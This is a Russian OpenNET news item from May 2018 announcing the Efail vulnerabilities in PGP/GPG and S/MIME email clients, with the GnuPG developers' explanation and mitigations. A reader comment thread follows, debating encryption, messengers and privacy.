The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

14.05.2018 10:58  Критическая уязвимость в системах шифрования email на основе PGP/GPG и S/MIME

Себастьян Шинцель (Sebastian Schinzel), авторитетный немецкий эксперт по компьютерной безопасности (один из авторов атаки DROWN), предупредил о выявлении критических уязвимостей в системах шифрования почтовой переписки, основанных на использовании PGP/GPG и S/MIME. Проблемы позволяют определить исходный открытый текст шифрованных писем, в том числе отправленных ранее зашифрованных писем. В настоящее время доступно лишь общее предупреждение, детали будут раскрыты 15 мая в 7 утра (UTC). Проблемам присвоено имя Efail.

Правозащитная организация Electronic Frontier Foundation (EFF) подтвердила, что выявленные уязвимости относятся к разряду наиболее критических проблем и представляют серьёзных риск для пользователей шифрованных коммуникаций по электронной почте, особенно так как проблемы позволяют получить доступ к содержимому ранее отправленных зашифрованных сообщений.

Утверждается, что надёжно работающих исправлений проблем пока не существует, поэтому пользователям PGP/GPG и S/MIME предлагается отключить в почтовых клиентах инструменты, поддерживающие автоматическую расшифровку сообщений. До формирования исправлений пользователям предлагается временно прекратить использование PGP для отправки и приёма писем и воспользоваться альтернативными каналами обмена шифрованными сообщениями, такими как Signal. Инструкции по отключению PGP/GPG и S/MIME подготовлены для Thunderbird с Enigmail, Apple Mail c GPGTools и Outlook c Gpg4win.

Судя по отрывочным сведениям, уязвимости напрямую не затрагивают PGP/GPG и S/MIME, а проявляются в конечных решениях на базе данных систем для почтовых клиентов и связаны с функциями автоматической расшифровки. С другой стороны, среди исследователей, которые входят в команду, выявившую уязвимость, в основном представлены эксперты, специализирующиеся на криптографических алгоритмах.

Дополнение: Разработчики GnuPG успокоили пользователей, что проблема напрямую не касается GnuPG и Enigmail, а затрагивает методы использования PGP в почтовых клиентах. Дополнительно появилось пояснение, что проблема касается только писем, переданных в формате HTML, т.е. из которых могут выполняться обращения к внешним ресурсам.

Судя по всему, проблема связана с тем, что HTML может использоваться как канал для подстановки в письма заранее известных меток (oracle), например, через манипуляции с тегом "img". Из-за недоработок в MIME-парсерах почтовых клиентов наличие в тексте подобных меток приводят к объединению связанных с ними фрагментов с расшифрованными MIME-блоками. Данная особенность может применяться для организации атак на основе подобранного шифротекста.

В качестве мер защиты разработчики GnuPG предлагают использовать аутентифицированное шифрование, например, рекомендуется использовать поддерживаемый в GnuPG с 2002 года механизм MDC (Modification Detection Codes) для предотвращения подстановки сторонних данных в содержимое. Атака становится невозможной, если в почтовом клиенте корректно используется MDC или реализован правильный MIME-парсер. Общий вывод: уязвимость не затрагивает протокол OpenPGP и его реализацию GnuPG, а охватывает только отдельные почтовые клиенты, в которых некорректно организован процесс шифрования, загружается содержимое внешних ссылок в HTML-тексте и отсутствует проверка MDC.

Дополнение 2: Досрочно раскрыты подробности атаки (для уязвимости создан отдельный сайт efail.de). Описание деталей изложено в отдельной новости.

  1. Главная ссылка к новости (https://www.eff.org/deeplinks/...)
  2. OpenNews: Выявлен дубликат короткого идентификатора PGP-ключа Линуса Торвальдса
  3. OpenNews: Обновление GnuPG с устранением уязвимости, позволяющей восстановить закрытые RSA-ключи
  4. OpenNews: Критическая уязвимость в генераторе случайных чисел GnuPG и Libgcrypt
  5. OpenNews: В Libgcrypt/GnuPG выявлена уязвимость, позволяющая воссоздать RSA-ключи
  6. OpenNews: В рамках проекта NeoPG развивается форк GnuPG 2
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: pgp, smime, gpg, gnupg
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Ajax/Линейный | Показать все | RSS
 
  • 1.1, Онвоним, 11:03, 14/05/2018 [ответить] [смотреть все]    [к модератору]
  • +/
    Зачем альтернативные каналы и signal? Просто отключить автоматическую расшифровку, и делать это руками.
     
     
  • 2.5, Онанимус, 11:08, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]
  • +2 +/
    Таки да Тем более не понятна связь между автоматической расшифровкой и уязвимос... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.10, Онвоним, 11:34, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Я предполагаю, что уязвимость - это сохранение почтовым клиентом исходного незаш... весь текст скрыт [показать]
     
     
  • 4.31, Онанимус, 12:08, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    IMAP Но в таком случае, уязвим трафик до IMAP сервера Дальше то письмо идет ши... весь текст скрыт [показать]
     
  • 1.2, лютый охохонюшка, 11:05, 14/05/2018 [ответить] [смотреть все]     [к модератору]  
  • –10 +/
    А ведь неломаемое шифрование изобрели ещё при царе Горохе, одноразовые шифр-блок... весь текст скрыт [показать]
     
     
  • 2.4, Кир, 11:07, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +3 +/
    и наградил всех счастливых потенциальных корреспондентов гигабайтами мусора ... весь текст скрыт [показать] [показать ветку]
     
  • 2.6, Креативные инноваторы, 11:08, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +13 +/
    повод съездить друг к другу в гости, да
     
  • 2.105, angra, 21:08, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +2 +/
    И как тебе эти блокноты помогут в ситуации, когда уязвимость не в самом механизме методе шифрования или ключе, а в взаимодействии клиентского софта с этим механизмом? Или ты новость не читал?
     
  • 1.3, Креативные инноваторы, 11:06, 14/05/2018 [ответить] [смотреть все]    [к модератору]  
  • +8 +/
    Настало время создавать логотип, логотип сам себя не создаст.
     
     
  • 2.11, Andrey Mitrofanov, 11:36, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • –2 +/
    Дыкыть анонса-то не было ещё Это слухи-утечки, подогревающие интерес покупател... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.13, Аноним, 11:37, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    по итогам, новость выеденного яйца не стоит
     
  • 3.15, Andrey Mitrofanov, 11:40, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Проблемам присвоено имя Efail Я прочитал наверху, да IMNSHO лучше б ден... весь текст скрыт [показать]
     
  • 3.18, Аноним, 11:43, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • –1 +/
    cTLD apple ещё не занята Эппл её хрен отсудит, так как можно сказать, что о... весь текст скрыт [показать]
     
  • 2.73, Вареник, 17:11, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • –1 +/
    И озаботиться рассово-половым составом команды разрабов.
     
  • 1.7, Аноним, 11:23, 14/05/2018 [ответить] [смотреть все]    [к модератору]  
  • +3 +/
    https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
     
     
  • 2.32, Andrey Mitrofanov, 12:08, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +1 +/
    Акхр HTML mails автоматическое рас шифровывание Расходимся, пацаны I ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.103, Аноним, 21:03, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • –1 +/
    >Use authenticated encryption.

    Кто-то ещё юзает unauthenticated encryption?

     
  • 1.8, Онаним, 11:27, 14/05/2018 [ответить] [смотреть все]     [к модератору]  
  • –10 +/
    В очередной раз убеждаюсь хочешь сделать хорошо - сделай это сам Систему шифро... весь текст скрыт [показать]
     
     
  • 2.9, sabakka, 11:32, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +16 +/
    люди годами не могут сделать, онаним запилит все за пару недель.
     
     
  • 3.12, Аноним, 11:36, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    делается ставка на неуловимого Джо
     
  • 2.16, pull request, 11:42, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +14 +/
    Первое правило криптографии - никогда не придумывай свою систему криптографии.
     
     
  • 3.23, Ivan_83, 11:54, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    забыл авторство АНБ указать :)
     
     
  • 4.104, Аноним, 21:05, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    > забыл авторство АНБ указать :)

    Интересно служил ли Брюс Шнайер в АНБ?

     
     
  • 5.108, Аноним, 21:13, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Вроде бы нет Но как минимум пару своих же алгоритмов он более не рекомендует, а... весь текст скрыт [показать]
     
  • 3.27, Аноним, 11:56, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +3 +/
    С этим правилом никакой криптографии бы не было.
     
     
  • 4.36, Andrey Mitrofanov, 12:33, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    >никакой криптографии бы не

    Никакой фантазии у людей.

     
     
  • 5.124, konst55512, 01:31, 15/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • –1 +/
    Есть фантазии.
    Самый безопасный метод общения между мной и В.Пупкиным такой:
    используй собственный вариант гав-но-шифровки, типа: tr/abc/cba/.
    Это реально работающий метод. Не один бот не расшифрует.
    А вот если всяким там ЦРУ/АНБ/ФСБ захочется мою переписку расшифровать, они не станут задействоать НИИ и проч., а используют безотказный паяльник. Дешевле и быстрее.
    Именно поэтому не вижу смысла с создании супер-алгоритмов шифрования.

     
     
  • 6.125, arisu, 01:44, 15/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    > типа: tr/abc/cba/.
    > Это реально работающий метод. Не один бот не расшифрует.

    лолушки. вот и Профессионалы Криптоанализа пожаловали. эти ваши гуаношифры как раз и ломаются *автоматически*. и нет, волшебные слова «я знаю про фестеля и сделал свой с-бокс!» тоже не спасут. всё ещё автоматически.

     
     
  • 7.127, konst55512, 03:20, 15/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    >> типа: tr/abc/cba/.
    >> Это реально работающий метод. Не один бот не расшифрует.
    > лолушки. вот и Профессионалы Криптоанализа пожаловали. эти ваши гуаношифры как раз и
    > ломаются *автоматически*. и нет, волшебные слова «я знаю про фестеля и
    > сделал свой с-бокс!» тоже не спасут. всё ещё автоматически.

    Вы категоррически не правы (imho).
    Я говорил о том, что расшифровать tr/abc/bca/ способен только И ТОЛЬКО тот, кто этого очень хочет. А простые боты используют стандартные способы расшифровки (известные уязвимости).
    А 2-е мое утверждение, которое не подлежит оспору, - это то, что если кому-то очень-очень захочется узнать, что же я написал Василию Пупкину сумеет сделать это гораздо менее затратно, чем догадавшись сделать tr/bca/abc/.

     
     
  • 8.128, arisu, 10:27, 15/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    я не знаю, что такое «простые боты», и какое они отношение имеют к шифрованию. впрочем, защищаться от воображаемых атакующих — дело приятное и даже иногда прибыльное.
     
  • 8.131, Аноним, 00:33, 16/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Криптография она как осетрина - бывает только первой свежести Второй сорт - так... весь текст скрыт [показать]
     
  • 4.45, rshadow, 13:10, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Итальянская забастовка: делать все _абсолютно в точности_ написанным правилам.
     
  • 4.66, Аноним, 15:07, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Именно поэтому правила криптографии появились уже после появления криптографии.
     
  • 3.34, Andrey Mitrofanov, 12:23, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    I If you think technology can solve your security problems, then you don t un... весь текст скрыт [показать]
     
  • 3.39, pkdr, 12:48, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • –1 +/
    Если бы так думали все, то до сих пор бы шифровали решётками, как у Жюля Верна и... весь текст скрыт [показать]
     
  • 3.48, unxed, 13:26, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    А вот использовать индустриальный стандарт одновременно со своей криптографией э... весь текст скрыт [показать]
     
     
  • 4.62, Аноним84701, 14:53, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • –1 +/
    Все верно, ведь все-все дыры во всех-всех алгоритмах причем сразу со сплойтами ... весь текст скрыт [показать]
     
     
  • 5.72, kk, 17:01, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +2 +/
    анальные карты очень наверное страшны когда на кону тысячи биткоинов ну что вы в... весь текст скрыт [показать]
     
     
  • 6.74, Аноним84701, 17:13, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Зато обосновывать отсутствие дыр в алгоритмах тем, что бывшие сотрудники АНБ не ... весь текст скрыт [показать]
     
  • 6.113, Anonimous, 21:31, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    > анальные карты очень наверное страшны когда на кону тысячи биткоинов

    полагаю, что в спецслужбах как в мафии: "анальные карты" за серьезный проступок приводят к тому, что даже тело оступившегося будет невозможно найти. Т.е с "анала" кары только начнутся, а не закончатся. Вы сильно переоцениваете значение денег.


     
  • 2.65, Ан, 15:07, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +1 +/
    Боюсь, на бизнесс времени не останется А если все и получится, то придут вежл... весь текст скрыт [показать] [показать ветку]
     
  • 1.14, Andrew, 11:37, 14/05/2018 [ответить] [смотреть все]     [к модератору]  
  • –7 +/
    99 пользователей имеют очень отдаленное представление о механизмах безопасности... весь текст скрыт [показать]
     
     
  • 2.17, Аноним, 11:43, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]    [к модератору]  
  • +1 +/
    Ископаемое, согласен. Но что на замену?
     
     
  • 3.20, Аноним, 11:52, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • –6 +/
    очевидный телеграм очевиден
     
     
  • 4.25, Ivan_83, 11:56, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    телеграм и сигнал пусть идут по дальше, такие проекты ущемляющие свободы пользов... весь текст скрыт [показать]
     
     
  • 5.28, Аноним, 11:57, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • –9 +/
    Сигнал да, но телеграм борется за свободы пользователей и их приватность ... весь текст скрыт [показать]
     
     
  • 6.33, Вы забыли заполнить поле Name, 12:12, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +11 +/
    Насмешил. Дуруов и Ко борются за свои денюшки и делают пиар для таких как ты.
     
     
  • 7.38, Crazy Alex, 12:47, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • –1 +/
    Насколько я понимаю, у них одно другому не мешает - но это пока противоречия нет... весь текст скрыт [показать]
     
     
  • 8.46, rshadow, 13:13, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    Так себе утверждение Пиарили-то серетные чаты, которыми никто не пользуется А ... весь текст скрыт [показать]
     
     
  • 9.47, Аноним, 13:23, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Говори только за себя.
     
     
  • 10.50, unxed, 13:33, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Наличие секретных чатов при доступности не секретных само по себе свидетельство ... весь текст скрыт [показать]
     
     
  • 11.51, Аноним, 13:48, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    Эти ваши бетховены никем не признанные фантики.
     
     
  • 12.129, unxed, 13:29, 15/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Какая разница, пока их можно обменять на кем-то признанные фантики.
     
  • 9.76, Crazy Alex, 17:28, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Нормальное утверждение Получать прибыль с пользовательской базы не обязательно ... весь текст скрыт [показать]
     
     
  • 10.80, Andrey Mitrofanov, 17:41, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    Морочить голову надо _отсутствием_ слежки, _гарантированным_ отсутствием на уров... весь текст скрыт [показать]
     
     
  • 11.81, Andrey Mitrofanov, 17:44, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Ещё неплохо заморочиться _гарантированным_ из,у беганием ,от угроз на уровне ... весь текст скрыт [показать]
     
  • 11.84, Crazy Alex, 17:59, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Кому-то надо, а кому-то и нет Что за манера решать за других, что им нужно и ч... весь текст скрыт [показать]
     
  • 8.58, Ivan_83, 14:25, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +2 +/
    Огрызок интенсивно пеарится, как и все американские сервисы Их цель - создать в... весь текст скрыт [показать]
     
     
  • 9.75, Crazy Alex, 17:20, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Кто там что им гарантирует - это уже фантазии пошли Не то, чтобы этого быть не ... весь текст скрыт [показать]
     
     
  • 10.91, Ivan_83, 18:23, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Как маленький А госы ихние по твоему что маки и венду не покупают Это самое оч... весь текст скрыт [показать]
     
  • 6.57, Ivan_83, 14:22, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +3 +/
    Любой централизованный месенгер никогда не даст никаких свобод, пользователь для... весь текст скрыт [показать]
     
     
  • 7.79, Crazy Alex, 17:37, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Ну я вот не представляю, как можно сделать надёжный, удобный и не особо жручий P... весь текст скрыт [показать]
     
     
  • 8.82, arisu, 17:45, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    потому что не надо ничего такого делать для 171 простых людей 187 если чело... весь текст скрыт [показать]
     
     
  • 9.83, Crazy Alex, 17:50, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Ну я ж даже примеры привёл с SSL и наркотой - оно вполне прилично защищает от пр... весь текст скрыт [показать]
     
     
  • 10.86, arisu, 18:09, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    для того, от чего 171 защищает 187 ssl 8212 он сильно переусложнён а мел... весь текст скрыт [показать]
     
     
  • 11.92, Ordu, 18:36, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    Естественно Я бы тоже так сказал А вот тут ты не прав Я делал так, и продолжа... весь текст скрыт [показать]
     
     
  • 12.109, Аноним, 21:19, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Ух ты, тут как раз в соседней ветке freehck завалился в такой режим Из всех арг... весь текст скрыт [показать]
     
  • 12.114, Anonimous, 21:42, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Моё наивысшее достижение -- я человека довёл
    > до пятилетнего возраста, он начал твердить мне что-то типа "ты дурак",
    > и что бы я ему не писал, он отвечал мне "ты
    > дурак". Было прикольно, жалко что за такие достижения не дают памятных
    > грамот и медалей. Я бы на стенку повесил.

    Сдаётся мне, что тот человек в корень зрил, а до тебя так и не дошло.
    Перечитай свой пост ещё раз, распечатай и повесь на стенку. Возможно однажды дойдет.

     
     
  • 13.117, Ordu, 22:19, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    >  Моё наивысшее достижение -- я человека довёл
    >> до пятилетнего возраста, он начал твердить мне что-то типа "ты дурак",
    >> и что бы я ему не писал, он отвечал мне "ты
    >> дурак". Было прикольно, жалко что за такие достижения не дают памятных
    >> грамот и медалей. Я бы на стенку повесил.
    > Сдаётся мне, что тот человек в корень зрил, а до тебя так
    > и не дошло.

    Да какая мне разница, куда он там зрил, если он от увиденного зрелища регрессировал до уровня пятилетнего?

     
  • 12.116, arisu, 21:51, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    это потому, что ты и есть дурак. такие дела.
     
     
  • 13.118, Ordu, 22:22, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    > это потому, что ты и есть дурак. такие дела.

    И чё? Я и без хомячьих подсказок знаю, собственно, и не скрываю. Ну, не кричу на всех углах об этом, конечно, но и не скрываю.

     
     
  • 14.120, Анонним, 00:12, 15/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    все хомяки, а я мамкин психоаналитик! Регрессия, говорите?
     
     
  • 15.121, Ordu, 00:44, 15/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    > все хомяки, а я мамкин психоаналитик! Регрессия, говорите?

    Так это не я говорю -- это Фройд говорил. Ты можешь заглянуть в википедию и убедиться в этом. А то что хомяки -- так вы же сами по своей собственной инициативе стали подражать тому хомячку. Тут уж, как говорится, назвался груздем, полезай в кузов.

     
     
  • 16.123, Anonimous, 01:03, 15/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    > Так это не я говорю -- это Фройд говорил. Ты можешь заглянуть
    > в википедию и убедиться в этом. А то что хомяки --
    > так вы же сами по своей собственной инициативе стали подражать тому
    > хомячку. Тут уж, как говорится, назвался груздем, полезай в кузов.

    это ты ловко с темы спрыгнул! на этом, пожалуй, и закончим.

     
  • 13.132, Аноним, 03:07, 16/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Парадокс в том что это пофиг Если некто демонстрирует уровень имбецила на публи... весь текст скрыт [показать]
     
  • 8.94, Ivan_83, 19:31, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    Нет промежуточной позиции.

    Поскольку оно привязано к мобиле - того кого надо быстро триангулируют, если он вообще на себя не зарегал.
    А заодно и звонки и смс подымут.
    А по имеи ещё и узнают какие ещё симки/номера бывали в этой мобиле.

    TLS был придумал чтобы пользоваться банковскими услугами онлайн, это априори подразумевает некоторую степень доверия всей этой системе и деанонимизацию.

     
     
  • 9.96, Crazy Alex, 19:57, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • –1 +/
    Ну вот тебе и промежуточная позиция - для триангуляции и подобного надо заинтересовать власти, причём откуда-то ещё, чтобы они пошевелились и предприняли какие-то действия. Но никак не читать/анализировать переписку всех со всеми, как с тем же скайпом или вконтактом.

    Насчёт TLS - именно, и мвои функции ин неплохо выполняет, заоднлюо рубя всяких горе-хакеров и на прочих сайтах

     
     
  • 10.122, Anonimous, 00:50, 15/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    "для триангуляции и подобного надо заинтересовать власти"

    это работает до тех пор пока они (власти) не обладают не обладают технической возможностью постоянно хранить всю бигдату где-то у себя. Как только такая возможность в России появится - нейронные сетки будут день и ночь заинтересованно копать и сопоставлять информацию. После этого можно будет 90% страны прислать различные штрафы по почте, а остальных сразу посадить. Для справки, в штатах подобное хранилище уже есть, https://en.wikipedia.org/wiki/Utah_Data_Center .
    Другое дело, что в штатах у каждого второго дома арсенал оружия, поэтому власти очень аккуратно себя ведут.

     
  • 5.29, Аноним, 11:58, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    как будто днс, который использует емейлом, не является таковым Только почтовые ... весь текст скрыт [показать]
     
     
  • 6.37, Andrey Mitrofanov, 12:38, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Deeper, bro I https gnunet org gns https duckduckgo com q gnunet dns h... весь текст скрыт [показать]
     
  • 6.102, Михрютка, 21:00, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    шутки шутками, а whois 25 числа обещали прикрыть, бо gdpr compliance
     
  • 5.30, Аноним, 12:02, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Ring, Tox
     
  • 3.21, Аноним, 11:53, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • –3 +/
    Телеграм.
     
     
  • 4.43, Аноним, 12:56, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    Кто бы объяснил: на фига телеграм привязан к телефонному номеру?
     
     
  • 5.49, Аноним, 13:30, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • –1 +/
    чтобы монетизировать сервис
     
     
  • 6.55, Аноним, 14:03, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    > чтобы монетизировать сервис

    Каким образом?


     
  • 5.52, Аноним, 13:50, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • –1 +/
    Кто бы объяснил: на фига опеннет привязан к почтовому ящику?
     
     
  • 6.63, Аноним, 14:55, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    "Гениальное" сравнение, молодец
     
     
  • 7.64, Аноним, 14:59, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • –1 +/
    Ты считаешь есть разница?
     
     
  • 8.90, Ordu, 18:20, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Да Я могу создать сколько угодно почтовых ящиков И очень часто создаю под новы... весь текст скрыт [показать]
     
     
  • 9.133, Аноним, 03:11, 16/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Это ты плохо искал Есть такие Недорого и круто У некоторых даже есть демо-ном... весь текст скрыт [показать]
     
  • 7.67, Аноним, 15:18, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Hacke Nnews вообще-то прекрасно обходится без почты
     
     
  • 8.78, arisu, 17:36, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    а ты, конечно, чтобы написать этот комментарий, был просто вынужден ввести свой ... весь текст скрыт [показать]
     
     
  • 9.88, Аноним, 18:14, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Мы тебе про регистрацию, а ты про комментарий.
     
  • 9.106, Михрютка, 21:09, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    >> Hacke Nnews вообще-то прекрасно обходится без почты
    > а ты, конечно, чтобы написать этот комментарий, был просто вынужден ввести свой
    > почтовый адрес.

    походу почтовый адрес моей учетки на опеннете не существует, как и домен. это мне не очень мешает.

     
     
  • 10.115, arisu, 21:44, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    глупый анонимус не в курсе, что на опеннете email при регистрации нужен исключительно для того, чтобы туда присылали комментарии, и вводить можно любую несуществующую фигню. но зато он Мнение Имеет!
     
  • 5.111, Михрютка, 21:22, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    > Кто бы объяснил: на фига телеграм привязан к телефонному номеру?

    коллега, если вы приучите простого пользователя, испорченного смартфонами, заносить в телефонную книгу не номер телефона, а vasiapupkin@gde-to-tam, вы испытаете просветление и станете стивджобсом.

    посчитайте, сколько у вас процентов в телефонной книге контактов, у которых не указан телефон, но указан какой-то другой идентификатор. обдумайте полученный результат.

    я молчу о том, что signal, например, изначально был сделан для шифрования sms. тут без номера телефона вообще тяжело.

     
     
  • 6.126, Аноним, 02:11, 15/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Кому нравится - пусть при регистрации указывает телефонный номер, но зачем же эт... весь текст скрыт [показать]
     
     
  • 7.130, Михрютка, 23:40, 15/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    на киевстар пожалуйся. они на каждой симке телефонный номер навязывают.
     
  • 6.134, Аноним, 03:23, 16/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Телефонный номер в смс - весьма абстрактная штука Если так посмотреть что в нем... весь текст скрыт [показать]
     
  • 4.59, Ivan_83, 14:28, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +1 +/
    ггг как вам мозги то промыли Телега от аськи и мыло агента отличается только в ... весь текст скрыт [показать]
     
  • 3.22, Вещества, 11:54, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +1 +/
    жаббер с omemo
     
  • 3.24, Аноним, 11:56, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    DIME Ладара Левисона?
     
  • 3.26, 1, 11:56, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    хипстерский телеграмчик А по делу Почта на бумаге - это 19 век если не раньше... весь текст скрыт [показать]
     
  • 1.19, Нанобот, 11:52, 14/05/2018 [ответить] [смотреть все]    [к модератору]  
  • –1 +/
    >среди исследователей, которые входят в команду, выявившую уязвимость, в основном представлены эксперты, специализирующиеся на криптографических алгоритмах

    не беда, сейчас эксперты опеннета разберут все остальные малоизученные области и выдадут своё экспертное заключение 😂

     
     
  • 2.35, Andrey Mitrofanov, 12:32, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +1 +/
    Особенно глубока и хорошо проработана экспертиза заключений эксертов по эксперти... весь текст скрыт [показать] [показать ветку]
     
  • 1.40, Annoynymous, 12:49, 14/05/2018 [ответить] [смотреть все]    [к модератору]  
  • +/
    Мы нашли уязвимость, но мы вам её не покажем, не расскажем и вообще, о чём новость?
     
     
  • 2.44, Ordu, 13:01, 14/05/2018 [^] [ответить] [смотреть все] [показать ветку]     [к модератору]  
  • +1 +/
    О том, что у тебя есть время до завтра подумать и хоть как-то среагировать на гр... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.53, Andrey Mitrofanov, 13:52, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Все писатели шифрованных HTML-писем соберут чемоданы, бросят квартиру -ы , машин... весь текст скрыт [показать]
     
     
  • 4.89, Ordu, 18:16, 14/05/2018 [^] [ответить] [смотреть все]     [к модератору]  
  • +/
    Нет, там же написано, что судя по всему будет достаточно срочно сменить email-кл... весь текст скрыт [показать]
     
  • 3.60, Аноним, 14:33, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Уже нету
    https://efail.de/
     
     
  • 4.61, Andrey Mitrofanov, 14:37, 14/05/2018 [^] [ответить] [смотреть все]    [к модератору]  
